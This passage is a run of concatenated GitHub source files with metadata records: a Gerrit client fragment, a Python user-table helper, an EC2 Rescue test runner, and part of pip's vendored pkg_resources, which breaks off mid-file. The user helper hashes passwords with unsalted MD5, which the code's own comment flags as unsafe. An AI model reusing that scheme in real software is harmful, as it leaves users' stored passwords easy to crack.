    """Return a ChangeClient bound to the given API connection."""
    return ChangeClient(connection)
| {
"content_hash": "86ed119b3bb3091caac8908c6dcefe2a",
"timestamp": "",
"source": "github",
"line_count": 247,
"max_line_length": 79,
"avg_line_length": 42.26315789473684,
"alnum_prop": 0.5983331736756394,
"repo_name": "tivaliy/python-gerritclient",
"id": "32d2ea6f84fe4fcdcadf7582cfa2326f6e9d4e40",
"size": "11052",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gerritclient/v1/change.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "306577"
}
],
"symlink_target": ""
} |
import time
import hashlib
import globaldb
class User(object):
    """Data-access helper for rows of the ``yagra_user`` table.

    Calling convention (kept for existing callers): most methods return
    ``0`` on success and ``-1`` on failure; ``insert_user`` returns the new
    row id (or ``-1``); ``get_user_all`` returns the row tuple or ``None``.
    """

    def __init__(self):
        # Shared module-level database connection.
        self.db = globaldb.db

    # password encoding
    def encode_pwd(self, str):
        """Return the hex MD5 digest of *str*, or "" when *str* is None.

        Accepts both text and bytes; text is UTF-8 encoded first (hashlib
        requires bytes on Python 3).

        NOTE(review): MD5 is not a safe password hash; kept only for
        compatibility with digests already stored in the database.
        """
        if str is None:
            return ""
        m = hashlib.md5()
        m.update(str if isinstance(str, bytes) else str.encode("utf-8"))
        return m.hexdigest()

    def insert_user(self, email, password):
        """Insert a new user row; return its id, or -1 on failure."""
        password = self.encode_pwd(password)
        sqlstr = """
        INSERT INTO `yagra`.`yagra_user`
        (
        `user_login`,
        `user_passwd`,
        `user_email`,
        `user_time`
        )
        VALUES
        (%s, %s, %s, %s)
        """
        c = self.db.cursor()
        try:
            c.execute(sqlstr, (email, password, email,
                               time.strftime('%Y-%m-%d %H:%M:%S')))
            self.db.commit()
            return c.lastrowid
        except Exception:
            self.db.rollback()
            return -1

    def get_user(self, name):
        """Return 0 if a user with email *name* exists, else -1."""
        sqlstr = "SELECT * FROM yagra_user WHERE user_email = %s"
        c = self.db.cursor()
        # Pass parameters as a proper one-element tuple.
        c.execute(sqlstr, (name,))
        # Truthiness instead of `len(result) is not 0` (identity comparison
        # on ints only worked by CPython small-int caching).
        if c.fetchall():
            return 0
        return -1

    def get_user_all(self, name):
        """Return the full row for email *name*, or None when absent."""
        sqlstr = "SELECT * FROM yagra_user WHERE user_email = %s"
        c = self.db.cursor()
        c.execute(sqlstr, (name,))
        result = c.fetchall()
        if result:
            return result[0]
        return None

    def check_user(self, name, password):
        """Return 0 when *name*/*password* match a stored row, else -1."""
        password = self.encode_pwd(password)
        sqlstr = ("SELECT * FROM yagra_user "
                  "WHERE user_email = %s AND user_passwd = %s")
        c = self.db.cursor()
        c.execute(sqlstr, (name, password))
        if c.fetchall():
            return 0
        return -1

    def update_password(self, name, password):
        """Set a new password for email *name*; 0 on success, -1 otherwise."""
        password = self.encode_pwd(password)
        sqlstr = "UPDATE yagra_user SET user_passwd = %s WHERE user_email = %s"
        c = self.db.cursor()
        try:
            affected = c.execute(sqlstr, (password, name))
            self.db.commit()
            if affected > 0:
                return 0
            return -1
        except Exception:
            self.db.rollback()
            return -1
| {
"content_hash": "ad6d33b4732d0b1ee24d2db447d255a8",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 86,
"avg_line_length": 26.604395604395606,
"alnum_prop": 0.4836844279223461,
"repo_name": "vincentpc/yagra",
"id": "4c5e49795fdc60dff57b4b3a3fa98135d09e7c20",
"size": "2459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "model/dbapi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18845"
},
{
"name": "JavaScript",
"bytes": "56320"
},
{
"name": "Python",
"bytes": "31276"
},
{
"name": "Shell",
"bytes": "6699"
}
],
"symlink_target": ""
} |
"""
Run unit tests for modules.
"""
from __future__ import print_function
import os
import sys
import unittest
import coverage
def main():
    """Discover and run the module unit tests under coverage.

    Derives the repo root from the invocation path, puts the root, its
    ``lib`` directory and (when run from it) the ``tools`` directory on
    sys.path, then runs unittest discovery with branch coverage.
    Exits with status 1 on path-parsing failure or test failure.
    """
    # Add the root program directory and the module tests directory to sys.path
    call_paths = list()
    split_call_path_list = os.path.abspath(sys.argv[0]).split(os.sep)
    # POSIX-specific: restore the leading root component lost by split().
    # NOTE(review): assumes a "/" filesystem root; not portable to Windows.
    split_call_path_list[0] = "/"
    this_files_name = os.path.split(__file__)[-1]
    # Strip the script's own filename, then (if present) the "tools" dir,
    # recording intermediate paths; abort if the path doesn't match.
    for file_name in [this_files_name, "tools"]:
        if split_call_path_list[-1] == file_name and file_name == "tools":
            call_paths.append(os.path.join(*split_call_path_list))
            split_call_path_list = split_call_path_list[0:-1]
        elif split_call_path_list[-1] == file_name:
            split_call_path_list = split_call_path_list[0:-1]
        else:
            print("Error parsing call path {} on token {}. Aborting.".format(os.path.join(*split_call_path_list),
                                                                             file_name))
            sys.exit(1)
    call_paths.append(os.path.join(*split_call_path_list))
    call_paths.append(os.path.join(call_paths[-1], "lib"))
    for call_path in call_paths:
        sys.path.insert(0, call_path)
    try:
        print("Running tests...")
        code_coverage = coverage.Coverage(branch=True, source=["moduletests/src/"])
        code_coverage.start()
        tests = unittest.TestLoader().discover(os.path.join(os.getcwd(), "moduletests", "unit"))
        results = unittest.runner.TextTestRunner().run(tests)
        # NOTE(review): when tests fail, sys.exit(1) runs before coverage
        # stop/save/report, so no coverage report is produced on failure.
        if not results.wasSuccessful():
            sys.exit(1)
        code_coverage.stop()
        code_coverage.save()
        code_coverage.report(show_missing=True)
    except Exception:
        print("Caught unhandled exception!")
        raise
# Allow direct execution as a script.
if __name__ == "__main__":
    main()
| {
"content_hash": "0ebac0521ee2ae09f08017747ccb86a4",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 113,
"avg_line_length": 36.1,
"alnum_prop": 0.5933518005540166,
"repo_name": "Drudenhaus/aws-ec2rescue-linux",
"id": "e210393dc770b34f3b6c56be1b8a321404c6b275",
"size": "2378",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "tools/run_module_unit_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "701"
},
{
"name": "Makefile",
"bytes": "4878"
},
{
"name": "Python",
"bytes": "4761897"
},
{
"name": "Shell",
"bytes": "5229"
}
],
"symlink_target": ""
} |
"""
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import types
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
import textwrap
from pkgutil import get_importer
try:
import _imp
except ImportError:
# Python 3.2 compatibility
import imp as _imp
from pip._vendor import six
from pip._vendor.six.moves import urllib, map, filter
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
try:
import importlib.machinery as importlib_machinery
# access attribute to force import under delayed import mechanisms.
importlib_machinery.__name__
except ImportError:
importlib_machinery = None
from pip._vendor import appdirs
from pip._vendor import packaging
__import__('pip._vendor.packaging.version')
__import__('pip._vendor.packaging.specifiers')
__import__('pip._vendor.packaging.requirements')
__import__('pip._vendor.packaging.markers')
if (3, 0) < sys.version_info < (3, 3):
msg = (
"Support for Python 3.0-3.2 has been dropped. Future versions "
"will fail here."
)
warnings.warn(msg)
# declare some globals that will be defined later to
# satisfy the linters.
require = None
working_set = None
class PEP440Warning(RuntimeWarning):
    """
    Warning category emitted when a version or specifier does not comply
    with PEP 440.
    """
class _SetuptoolsVersionMixin(object):
    """Add legacy tuple-style comparison and iteration to version objects.

    Before setuptools 8.0, parse_version() returned a plain tuple (see the
    RuntimeWarning text in __iter__); this mixin lets the PEP 440 version
    classes below still compare against, index like, and iterate like
    those legacy tuples.
    """

    def __hash__(self):
        return super(_SetuptoolsVersionMixin, self).__hash__()

    def __lt__(self, other):
        if isinstance(other, tuple):
            # Compare via the legacy tuple form.
            return tuple(self) < other
        else:
            return super(_SetuptoolsVersionMixin, self).__lt__(other)

    def __le__(self, other):
        if isinstance(other, tuple):
            return tuple(self) <= other
        else:
            return super(_SetuptoolsVersionMixin, self).__le__(other)

    def __eq__(self, other):
        if isinstance(other, tuple):
            return tuple(self) == other
        else:
            return super(_SetuptoolsVersionMixin, self).__eq__(other)

    def __ge__(self, other):
        if isinstance(other, tuple):
            return tuple(self) >= other
        else:
            return super(_SetuptoolsVersionMixin, self).__ge__(other)

    def __gt__(self, other):
        if isinstance(other, tuple):
            return tuple(self) > other
        else:
            return super(_SetuptoolsVersionMixin, self).__gt__(other)

    def __ne__(self, other):
        if isinstance(other, tuple):
            return tuple(self) != other
        else:
            return super(_SetuptoolsVersionMixin, self).__ne__(other)

    def __getitem__(self, key):
        # Indexing operates on the legacy tuple representation.
        return tuple(self)[key]

    def __iter__(self):
        # Legacy (pre-8.0) parsing: split into numeric / alphabetic parts.
        component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
        replace = {
            'pre': 'c',
            'preview': 'c',
            '-': 'final-',
            'rc': 'c',
            'dev': '@',
        }.get

        def _parse_version_parts(s):
            for part in component_re.split(s):
                part = replace(part, part)
                if not part or part == '.':
                    continue
                if part[:1] in '0123456789':
                    # pad for numeric comparison
                    yield part.zfill(8)
                else:
                    # '*' (ASCII 42) sorts before digits, so alphabetic
                    # parts order before zero-padded numbers.
                    yield '*' + part

            # ensure that alpha/beta/candidate are before final
            yield '*final'

        def old_parse_version(s):
            parts = []
            for part in _parse_version_parts(s.lower()):
                if part.startswith('*'):
                    # remove '-' before a prerelease tag
                    if part < '*final':
                        while parts and parts[-1] == '*final-':
                            parts.pop()
                    # remove trailing zeros from each series of numeric parts
                    while parts and parts[-1] == '00000000':
                        parts.pop()
                parts.append(part)
            return tuple(parts)

        # Warn for use of this function
        warnings.warn(
            "You have iterated over the result of "
            "pkg_resources.parse_version. This is a legacy behavior which is "
            "inconsistent with the new version class introduced in setuptools "
            "8.0. In most cases, conversion to a tuple is unnecessary. For "
            "comparison of versions, sort the Version instances directly. If "
            "you have another use case requiring the tuple, please file a "
            "bug with the setuptools project describing that need.",
            RuntimeWarning,
            stacklevel=1,
        )

        for part in old_parse_version(str(self)):
            yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
    """PEP 440-compliant version that also supports legacy tuple compares."""
    pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
                              packaging.version.LegacyVersion):
    """Fallback for version strings that are not valid under PEP 440."""
    pass
def parse_version(v):
    """Parse a version string, preferring PEP 440 semantics.

    Falls back to SetuptoolsLegacyVersion when *v* is not a valid
    PEP 440 version.
    """
    try:
        return SetuptoolsVersion(v)
    except packaging.version.InvalidVersion:
        return SetuptoolsLegacyVersion(v)
_state_vars = {}
def _declare_state(vartype, **kw):
    """Create module-level state variables of the given kind.

    Each keyword becomes a module global, and its name is recorded in
    ``_state_vars`` under *vartype* so __getstate__/__setstate__ know how
    to snapshot and restore it.
    """
    module_globals = globals()
    for name, initial in kw.items():
        module_globals[name] = initial
        _state_vars[name] = vartype
def __getstate__():
    """Snapshot all registered module state into a plain dict."""
    module_globals = globals()
    return {
        name: module_globals['_sget_' + kind](module_globals[name])
        for name, kind in _state_vars.items()
    }
def __setstate__(state):
    """Restore module state captured by __getstate__; returns *state*."""
    module_globals = globals()
    for name, value in state.items():
        setter = module_globals['_sset_' + _state_vars[name]]
        setter(name, module_globals[name], value)
    return state
def _sget_dict(val):
    """Snapshot a dict-kind state variable (shallow copy)."""
    return val.copy()


def _sset_dict(key, ob, state):
    """Restore a dict-kind state variable in place."""
    ob.clear()
    ob.update(state)


def _sget_object(val):
    """Snapshot an object-kind state variable via its __getstate__."""
    return val.__getstate__()


def _sset_object(key, ob, state):
    """Restore an object-kind state variable via its __setstate__."""
    ob.__setstate__(state)


# 'none'-kind state: nothing to capture or restore.
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
    """Return this platform's maximum compatible version.

    distutils.util.get_platform() normally reports the minimum version
    of Mac OS X that would be required to *use* extensions produced by
    distutils.  But what we want when checking compatibility is to know the
    version of Mac OS X that we are *running*.  To allow usage of packages that
    explicitly require a newer version of Mac OS X, we must also know the
    current version of the OS.

    If this condition occurs for any other platform with a version in its
    platform strings, this function should be extended accordingly.
    """
    plat = get_build_platform()
    m = macosVersionString.match(plat)
    if m is None or sys.platform != "darwin":
        return plat
    try:
        # Substitute the running OS version for the build-time minimum.
        return 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
    except ValueError:
        # not Mac OS X
        return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
    """Abstract base for dependency resolution errors"""

    def __repr__(self):
        # e.g. "DistributionNotFound('foo', None)" -- subclass name + args.
        return type(self).__name__ + repr(self.args)
class VersionConflict(ResolutionError):
    """
    An already-installed version conflicts with the requested version.

    Should be initialized with the installed Distribution and the requested
    Requirement.
    """

    _template = "{self.dist} is installed but {self.req} is required"

    @property
    def dist(self):
        # Installed distribution: first positional argument.
        return self.args[0]

    @property
    def req(self):
        # Conflicting requirement: second positional argument.
        return self.args[1]

    def report(self):
        """Render a human-readable description of the conflict."""
        return self._template.format(self=self)

    def with_context(self, required_by):
        """
        If required_by is non-empty, return a version of self that is a
        ContextualVersionConflict.
        """
        if not required_by:
            return self
        return ContextualVersionConflict(*(self.args + (required_by,)))
class ContextualVersionConflict(VersionConflict):
    """
    A VersionConflict that accepts a third parameter, the set of the
    requirements that required the installed Distribution.
    """

    # Extend the parent message with the requirers of the conflicting dist.
    _template = VersionConflict._template + ' by {self.required_by}'

    @property
    def required_by(self):
        # Requirers (third positional argument); WorkingSet.resolve passes
        # a set of project names here.
        return self.args[2]
class DistributionNotFound(ResolutionError):
    """A requested distribution was not found"""

    _template = ("The '{self.req}' distribution was not found "
                 "and is required by {self.requirers_str}")

    @property
    def req(self):
        # The unsatisfied requirement: first positional argument.
        return self.args[0]

    @property
    def requirers(self):
        # Iterable of requirer names (or None): second positional argument.
        return self.args[1]

    @property
    def requirers_str(self):
        """Comma-separated requirer names, or a generic fallback."""
        names = self.requirers
        if not names:
            return 'the application'
        return ', '.join(names)

    def report(self):
        """Render the error message."""
        return self._template.format(self=self)

    def __str__(self):
        return self.report()
class UnknownExtra(ResolutionError):
    """Distribution doesn't have an "extra feature" of the given name"""
# PEP 302 loader type -> provider factory; populated by
# register_loader_type() and consulted by get_provider().
_provider_factories = {}

# NOTE(review): slicing sys.version yields "3.1" on Python 3.10+; kept
# verbatim to match the vendored upstream behavior.
PY_MAJOR = sys.version[:3]

# Distribution "precedence" constants (see __all__); larger values take
# precedence -- TODO confirm exact use in Environment.best_match (not in view).
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
    """Register `provider_factory` to make providers for `loader_type`

    `loader_type` is the type or class of a PEP 302 ``module.__loader__``,
    and `provider_factory` is a function that, passed a *module* object,
    returns an ``IResourceProvider`` for that module.
    """
    # Later registrations override earlier ones for the same loader type.
    _provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
    """Return an IResourceProvider for the named module or requirement"""
    if isinstance(moduleOrReq, Requirement):
        # A Requirement resolves to its active (or newly required) dist.
        return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
    try:
        module = sys.modules[moduleOrReq]
    except KeyError:
        # Import on demand so resources can be resolved lazily.
        __import__(moduleOrReq)
        module = sys.modules[moduleOrReq]
    loader = getattr(module, '__loader__', None)
    # Pick the provider factory registered for this loader's type.
    return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
    # Return the Mac OS X version as a list of string components.
    # NOTE: the mutable default argument is deliberate -- it memoizes the
    # result for the lifetime of the process.
    if not _cache:
        version = platform.mac_ver()[0]
        # fallback for MacPorts
        if version == '':
            plist = '/System/Library/CoreServices/SystemVersion.plist'
            if os.path.exists(plist):
                # plistlib.readPlist was removed in Python 3.9; the hasattr
                # guard keeps this fallback from crashing there.
                if hasattr(plistlib, 'readPlist'):
                    plist_content = plistlib.readPlist(plist)
                    if 'ProductVersion' in plist_content:
                        version = plist_content['ProductVersion']

        _cache.append(version.split('.'))

    return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
    """Return this platform's string for platform-specific distributions

    XXX Currently this is the same as ``distutils.util.get_platform()``, but it
    needs some hacks for Linux and Mac OS X.
    """
    try:
        # Python 2.7 or >=3.2
        from sysconfig import get_platform
    except ImportError:
        from distutils.util import get_platform

    plat = get_platform()
    if sys.platform == "darwin" and not plat.startswith('macosx-'):
        try:
            version = _macosx_vers()
            # uname machine names may contain spaces ("Power Macintosh")
            machine = os.uname()[4].replace(" ", "_")
            return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
                                        _macosx_arch(machine))
        except ValueError:
            # if someone is running a non-Mac darwin system, this will fall
            # through to the default implementation
            pass
    return plat
# Platform-string patterns: modern "macosx-<major>.<minor>-<arch>" and the
# legacy (pre-setuptools 0.6) "darwin-<x>.<y>.<z>-<arch>" designation.
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
    """Can code for the `provided` platform run on the `required` platform?

    Returns true if either platform is ``None``, or the platforms are equal.

    XXX Needs compatibility checks for Linux and other unixy OSes.
    """
    if provided is None or required is None or provided == required:
        # easy case
        return True

    # Mac OS X special cases
    reqMac = macosVersionString.match(required)
    if reqMac:
        provMac = macosVersionString.match(provided)

        # is this a Mac package?
        if not provMac:
            # this is backwards compatibility for packages built before
            # setuptools 0.6. All packages built after this point will
            # use the new macosx designation.
            provDarwin = darwinVersionString.match(provided)
            if provDarwin:
                dversion = int(provDarwin.group(1))
                macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
                # NOTE(review): lexicographic string comparison; adequate
                # for the 10.3/10.4-era values handled here.
                if dversion == 7 and macosversion >= "10.3" or \
                        dversion == 8 and macosversion >= "10.4":
                    return True
            # egg isn't macosx or legacy darwin
            return False

        # are they the same major version and machine type?
        if provMac.group(1) != reqMac.group(1) or \
                provMac.group(3) != reqMac.group(3):
            return False

        # is the required OS major update >= the provided one?
        if int(provMac.group(2)) > int(reqMac.group(2)):
            return False

        return True

    # XXX Linux and other platforms' special cases should go here
    return False
def run_script(dist_spec, script_name):
    """Locate distribution `dist_spec` and run its `script_name` script"""
    ns = sys._getframe(1).f_globals
    name = ns['__name__']
    # Reset the caller's global namespace (keeping only __name__) so the
    # script executes as if it were a fresh module.
    ns.clear()
    ns['__name__'] = name
    require(dist_spec)[0].run_script(script_name, ns)


# backward compatibility
run_main = run_script
def get_distribution(dist):
    """Return a current distribution object for a Requirement or string"""
    # Normalize in two steps: string -> Requirement -> Distribution
    # (resolved through the working set via get_provider()).
    if isinstance(dist, six.string_types):
        dist = Requirement.parse(dist)
    if isinstance(dist, Requirement):
        dist = get_provider(dist)
    if not isinstance(dist, Distribution):
        raise TypeError("Expected string, Requirement, or Distribution", dist)
    return dist
def load_entry_point(dist, group, name):
    """Return `name` entry point of `group` for `dist` or raise ImportError"""
    # `dist` may be a string, Requirement, or Distribution (see
    # get_distribution); the same applies to the two wrappers below.
    return get_distribution(dist).load_entry_point(group, name)


def get_entry_map(dist, group=None):
    """Return the entry point map for `group`, or the full entry map"""
    return get_distribution(dist).get_entry_map(group)


def get_entry_info(dist, group, name):
    """Return the EntryPoint object for `group`+`name`, or ``None``"""
    return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
    """Interface: metadata access for a distribution.

    NOTE: the methods below are interface specifications only -- they
    intentionally omit ``self`` and have docstring-only bodies; the class
    is not meant to be instantiated or subclassed with super() calls.
    """

    def has_metadata(name):
        """Does the package's distribution contain the named metadata?"""

    def get_metadata(name):
        """The named metadata resource as a string"""

    def get_metadata_lines(name):
        """Yield named metadata resource as list of non-blank non-comment lines

        Leading and trailing whitespace is stripped from each line, and lines
        with ``#`` as the first non-blank character are omitted."""

    def metadata_isdir(name):
        """Is the named metadata a directory?  (like ``os.path.isdir()``)"""

    def metadata_listdir(name):
        """List of metadata names in the directory (like ``os.listdir()``)"""

    def run_script(script_name, namespace):
        """Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
    """An object that provides access to package resources

    NOTE: like its base class, this is an interface specification; the
    methods intentionally omit ``self``.
    """

    def get_resource_filename(manager, resource_name):
        """Return a true filesystem path for `resource_name`

        `manager` must be an ``IResourceManager``"""

    def get_resource_stream(manager, resource_name):
        """Return a readable file-like object for `resource_name`

        `manager` must be an ``IResourceManager``"""

    def get_resource_string(manager, resource_name):
        """Return a string containing the contents of `resource_name`

        `manager` must be an ``IResourceManager``"""

    def has_resource(resource_name):
        """Does the package contain the named resource?"""

    def resource_isdir(resource_name):
        """Is the named resource a directory?  (like ``os.path.isdir()``)"""

    def resource_listdir(resource_name):
        """List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
    """A collection of active distributions on sys.path (or a similar list)"""

    def __init__(self, entries=None):
        """Create working set from list of path entries (default=sys.path)"""
        # Path entries in order; may contain duplicates (mirrors sys.path).
        self.entries = []
        # path entry -> list of distribution keys found on that entry
        self.entry_keys = {}
        # distribution key -> active Distribution
        self.by_key = {}
        # Subscriber callables invoked (via _added_new) per activated dist.
        self.callbacks = []

        if entries is None:
            entries = sys.path

        for entry in entries:
            self.add_entry(entry)

    @classmethod
    def _build_master(cls):
        """
        Prepare the master working set.
        """
        ws = cls()
        try:
            from __main__ import __requires__
        except ImportError:
            # The main program does not list any requirements
            return ws

        # ensure the requirements are met
        try:
            ws.require(__requires__)
        except VersionConflict:
            return cls._build_from_requirements(__requires__)

        return ws

    @classmethod
    def _build_from_requirements(cls, req_spec):
        """
        Build a working set from a requirement spec. Rewrites sys.path.
        """
        # try it without defaults already on sys.path
        # by starting with an empty path
        ws = cls([])
        reqs = parse_requirements(req_spec)
        dists = ws.resolve(reqs, Environment())
        for dist in dists:
            ws.add(dist)

        # add any missing entries from sys.path
        for entry in sys.path:
            if entry not in ws.entries:
                ws.add_entry(entry)

        # then copy back to sys.path
        sys.path[:] = ws.entries
        return ws

    def add_entry(self, entry):
        """Add a path item to ``.entries``, finding any distributions on it

        ``find_distributions(entry, True)`` is used to find distributions
        corresponding to the path entry, and they are added.  `entry` is
        always appended to ``.entries``, even if it is already present.
        (This is because ``sys.path`` can contain the same value more than
        once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
        equal ``sys.path``.)
        """
        self.entry_keys.setdefault(entry, [])
        self.entries.append(entry)
        for dist in find_distributions(entry, True):
            # insert=False: the entry was already appended above.
            self.add(dist, entry, False)

    def __contains__(self, dist):
        """True if `dist` is the active distribution for its project"""
        return self.by_key.get(dist.key) == dist

    def find(self, req):
        """Find a distribution matching requirement `req`

        If there is an active distribution for the requested project, this
        returns it as long as it meets the version requirement specified by
        `req`.  But, if there is an active distribution for the project and it
        does *not* meet the `req` requirement, ``VersionConflict`` is raised.
        If there is no active distribution for the requested project, ``None``
        is returned.
        """
        dist = self.by_key.get(req.key)
        if dist is not None and dist not in req:
            # XXX add more info
            raise VersionConflict(dist, req)
        return dist

    def iter_entry_points(self, group, name=None):
        """Yield entry point objects from `group` matching `name`

        If `name` is None, yields all entry points in `group` from all
        distributions in the working set, otherwise only ones matching
        both `group` and `name` are yielded (in distribution order).
        """
        for dist in self:
            entries = dist.get_entry_map(group)
            if name is None:
                for ep in entries.values():
                    yield ep
            elif name in entries:
                yield entries[name]

    def run_script(self, requires, script_name):
        """Locate distribution for `requires` and run `script_name` script"""
        ns = sys._getframe(1).f_globals
        name = ns['__name__']
        # Reset the caller's globals (keeping only __name__) so the script
        # runs in a fresh namespace.
        ns.clear()
        ns['__name__'] = name
        self.require(requires)[0].run_script(script_name, ns)

    def __iter__(self):
        """Yield distributions for non-duplicate projects in the working set

        The yield order is the order in which the items' path entries were
        added to the working set.
        """
        seen = {}
        for item in self.entries:
            if item not in self.entry_keys:
                # workaround a cache issue
                continue

            for key in self.entry_keys[item]:
                if key not in seen:
                    seen[key] = 1
                    yield self.by_key[key]

    def add(self, dist, entry=None, insert=True, replace=False):
        """Add `dist` to working set, associated with `entry`

        If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
        On exit from this routine, `entry` is added to the end of the working
        set's ``.entries`` (if it wasn't already present).

        `dist` is only added to the working set if it's for a project that
        doesn't already have a distribution in the set, unless `replace=True`.
        If it's added, any callbacks registered with the ``subscribe()`` method
        will be called.
        """
        if insert:
            dist.insert_on(self.entries, entry, replace=replace)

        if entry is None:
            entry = dist.location
        # Record the dist's key under both the given entry and its location.
        keys = self.entry_keys.setdefault(entry, [])
        keys2 = self.entry_keys.setdefault(dist.location, [])
        if not replace and dist.key in self.by_key:
            # ignore hidden distros
            return

        self.by_key[dist.key] = dist
        if dist.key not in keys:
            keys.append(dist.key)
        if dist.key not in keys2:
            keys2.append(dist.key)
        # Notify subscribers of the newly activated distribution.
        self._added_new(dist)

    def resolve(self, requirements, env=None, installer=None,
                replace_conflicting=False):
        """List all distributions needed to (recursively) meet `requirements`

        `requirements` must be a sequence of ``Requirement`` objects.  `env`,
        if supplied, should be an ``Environment`` instance.  If
        not supplied, it defaults to all distributions available within any
        entry or distribution in the working set.  `installer`, if supplied,
        will be invoked with each requirement that cannot be met by an
        already-installed distribution; it should return a ``Distribution`` or
        ``None``.

        Unless `replace_conflicting=True`, raises a VersionConflict exception if
        any requirements are found on the path that have the correct name but
        the wrong version.  Otherwise, if an `installer` is supplied it will be
        invoked to obtain the correct version of the requirement and activate
        it.
        """
        # set up the stack
        requirements = list(requirements)[::-1]
        # set of processed requirements
        processed = {}
        # key -> dist
        best = {}
        to_activate = []

        req_extras = _ReqExtras()

        # Mapping of requirement to set of distributions that required it;
        # useful for reporting info about conflicts.
        required_by = collections.defaultdict(set)

        while requirements:
            # process dependencies breadth-first
            req = requirements.pop(0)
            if req in processed:
                # Ignore cyclic or redundant dependencies
                continue

            if not req_extras.markers_pass(req):
                # Environment-marker evaluation excluded this requirement.
                continue

            dist = best.get(req.key)
            if dist is None:
                # Find the best distribution and add it to the map
                dist = self.by_key.get(req.key)
                if dist is None or (dist not in req and replace_conflicting):
                    ws = self
                    if env is None:
                        if dist is None:
                            env = Environment(self.entries)
                        else:
                            # Use an empty environment and workingset to avoid
                            # any further conflicts with the conflicting
                            # distribution
                            env = Environment([])
                            ws = WorkingSet([])
                    dist = best[req.key] = env.best_match(req, ws, installer)
                    if dist is None:
                        requirers = required_by.get(req, None)
                        raise DistributionNotFound(req, requirers)
                to_activate.append(dist)
            if dist not in req:
                # Oops, the "best" so far conflicts with a dependency
                dependent_req = required_by[req]
                raise VersionConflict(dist, req).with_context(dependent_req)

            # push the new requirements onto the stack
            new_requirements = dist.requires(req.extras)[::-1]
            requirements.extend(new_requirements)

            # Register the new requirements needed by req
            for new_requirement in new_requirements:
                required_by[new_requirement].add(req.project_name)
                req_extras[new_requirement] = req.extras

            processed[req] = True

        # return list of distros to activate
        return to_activate

    def find_plugins(self, plugin_env, full_env=None, installer=None,
                     fallback=True):
        """Find all activatable distributions in `plugin_env`

        Example usage::

            distributions, errors = working_set.find_plugins(
                Environment(plugin_dirlist)
            )
            # add plugins+libs to sys.path
            map(working_set.add, distributions)
            # display errors
            print('Could not load', errors)

        The `plugin_env` should be an ``Environment`` instance that contains
        only distributions that are in the project's "plugin directory" or
        directories. The `full_env`, if supplied, should be an ``Environment``
        contains all currently-available distributions.  If `full_env` is not
